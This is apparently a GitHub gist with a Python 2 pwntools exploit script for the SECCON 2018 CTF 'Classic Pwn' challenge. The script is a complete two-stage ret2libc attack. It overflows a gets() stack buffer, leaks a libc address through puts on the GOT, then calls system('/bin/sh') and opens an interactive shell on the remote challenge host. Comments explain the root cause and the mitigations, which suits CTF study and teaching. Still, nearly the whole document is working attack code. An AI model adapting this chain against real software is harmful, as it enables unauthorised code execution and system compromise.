@ywkw1717

ywkw1717/classic_pwn

Created Oct 28, 2018
SECCON 2018 Online CTF Classic Pwn
#!/usr/bin/env python
from pwn import *
def main():
    """Two-stage ret2libc chain for the SECCON 2018 "Classic Pwn" challenge.

    Stage 1 overflows the stack buffer, returns into puts() with the GOT
    entry of gets() as the argument (via the pop gadget), and then returns
    to main so the program reads input a second time.  Stage 2 reuses the
    same overflow to call system() on the "/bin/sh" string found in libc.

    Root cause, as far as this script shows: the target imports gets()
    (see the GOT and symbol lookups below), which reads unbounded input into
    a fixed-size stack buffer.  A length-bounded read (fgets/read) plus a
    stack canary removes the overflow; PIE would additionally invalidate the
    hard-coded gadget, PLT and main addresses this chain relies on.

    Python 2 only: the print statements and str/bytes concatenation do not
    run under Python 3.
    """
    # conn = process("./classic_aa9e979fd5c597526ef30c003bffee474b314e22")
    conn = remote("classic.pwn.seccon.jp", 17354)
    # Target binary; used only to resolve GOT/PLT entries and main's address.
    elf = ELF("./classic_aa9e979fd5c597526ef30c003bffee474b314e22")
    # libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    # The libc shipped with the challenge.  Its symbol offsets must match the
    # remote server's libc, otherwise libc_base below is wrong.
    libc = ELF("./libc-2.23.so_56d992a0342a67a887b8dcaae381d2cc51205253")
    # Hard-coded gadget address in the (presumably non-PIE) binary.  From its
    # use below it is expected to pop one argument register and return; the
    # value is not derived here -- verify against the binary.
    popret = 0x400753
    # first payload
    # 72 bytes of filler reach the saved return address (offset taken from
    # the binary, not computed here).
    payload = "A" * 72
    payload += p64(popret)
    payload += p64(elf.got["gets"])   # argument: GOT slot holding gets@libc
    payload += p64(elf.plt["puts"])   # puts() prints that slot's contents
    payload += p64(elf.symbols["main"]) # return address: re-run main for stage 2
    conn.recvuntil(">> ")
    conn.sendline(payload)
    conn.recvuntil("Have a nice pwn!!\n")
    # puts() stops at the first NUL byte; on x86-64 a user-space pointer has
    # two leading zero bytes, so 6 bytes arrive and are padded back to 8.
    leak_addr = u64(conn.recv(6) + "\x00\x00")
    libc_base = leak_addr - libc.symbols["gets"]
    system_addr = libc_base + libc.symbols["system"]
    print "libc_base: " + hex(libc_base)
    print "system_addr: " + hex(system_addr)
    # second payload
    payload = "A" * 72
    payload += p64(popret)
    # Argument: address of the "/bin/sh" string inside the leaked libc.
    payload += p64(libc_base + next(libc.search('/bin/sh')))
    payload += p64(system_addr)
    # Return address after system(); a clean exit is not attempted.
    payload += p64(0xdeadbeef)
    conn.recvuntil(">> ")
    conn.sendline(payload)
    conn.interactive()
# Script entry point; nothing runs on import.
if __name__ == "__main__":
    main()